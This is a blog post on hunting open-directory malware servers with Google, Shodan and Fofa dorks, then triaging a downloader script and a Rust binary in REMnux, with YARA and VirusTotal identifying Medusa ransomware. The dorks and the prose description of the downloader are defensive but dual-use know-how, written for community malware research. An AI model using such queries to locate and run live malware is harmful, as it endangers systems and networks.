Hello, I thought about writing a blog post, about searching for malware servers and analyzing the containing malware files with REMnux.
There is a big community of security researcher an malware hunters, which searchs for malware servers, and analyzes malware files. You can support them by also searching for those servers and their malicious content. Additional you can post some findings on social media to help them. May some Researcher, which can analyze it for you if you can't, or can create signatures for the whole community of security researchers.
Disclaimer: When doing this, it could happen that you fuck up your system or network. Please threat it with caution. I accept no liability for any damage which could occur.
Prerequisites
- A computer only for those purposes.
- REMnux which can be downloaded here
- If running it as VM then VMWare or VirualBox needed
- If running it as Docker then docker is needed
I will use the docker version of REMnux and use this as toolbox.
How I start?
Well, that's a good question. To find those servers it's a good starting place to look on social media for hashtags like #opendir
#malware
#c2
and so on. This gives you an small overview how the files could be named, what could be intresting keyword for search engines like google, shodan or fofa.info
Here an small overview of dorks and queries:
intitle:"Index of" <keyword>
intitle:"Index of" bins.sh
...
intitle:index of intext:"Last modified"
intitle:"Index of" intext:"Last modified"
...
Shodan.io
"category:malware"
http.title:"Index of /"
http.title:"Directory listing for /"
Fofa.info
title="Index of /" && body=".exe"
server="SimpleHTTP/*" && title=="Directory listing for /"
server="SimpleHTTP/*" && title=="Directory listing for /" && body=".exe"
server="SimpleHTTP/*" && title=="Directory listing for /" && body=".sh"
Target malware server
Here for an example, we see an web server with directory listing enabled. This directory contains some malicous files. For reasons of don't get hacked by the maintainers, the screenshot is cropped.
Here we see 5 interesting files, the first one which I want to analyze is the file bins.sh
Closer look to the shell script
The content of the bins.sh
file looks like a downloader, which tries to download each binary on the server, and tries to executes them.
For each binary it tries to find a writeable directory for downloading it. Then it tries to download the binary, make this executable and then it runs the binary. After running the binary, the binary get deleted to cover the tracks. But trough running the binary, the malware will still remain in memory. Ok, let's download one of binaries and try to find out what we have. I downloaded the binary client-x86_64-unknown-linux-gnu
in my REMnux container.
Closer look to the binary
Note: I don't decompile it nor I want to use tools for reversing in detailed pieces!
With the tool called Detect-It-Easy, we see it is an rust binary. Let's try to get some hits with YARA.
yara /usr/local/yara-rules/*_index.yar -m -s -f client-x86_64-unknown-linux-gnu
Here we see some results from yara scan which tries every rule we have preinstalled in REMnux.
By running string we see, the binary calls back to the same server on a different port. It looks the binary connects back and receives command via JSON-format over UDP maybe.
Virustotal scan & results
Now I go over to scan the bins.sh
file with VT-CLI which can be found here https://github.com/VirusTotal/vt-cli.
Also an VT scan of the bins.sh
gives us an Base64 string. When we run the analysis we get an report back that is on status queued.
Well, lets decode the base64 string, to view it on the Virustotal website itself.
echo ZDMyNDFmOWU2Nzg3NzliYTI0YmM4YmMzYjczOTlhZjY6MTcwNzU3MDMzOQ== | base64 -d
d3241f9e678779ba24bc8bc3b7399af6:1707570339
The first part of the decoded base64 string is an MD5 hash which we can use to lookup on Virustotal.
The entered hash redirects us to this provided link: https://www.virustotal.com/gui/file/3f19cab6ac8e62cd117c8039c793a69f311d9a131c6592bb6c2eb18c76fc7ffd
Here we see that this software is flagged as malicious, and we also see we have found Medusa Ransomware / Botnet malware.
I submitted all files to Virustotal, after writing this blog post. May it helps the other security researcher and professionals
I hope you like it, and you had fun 😄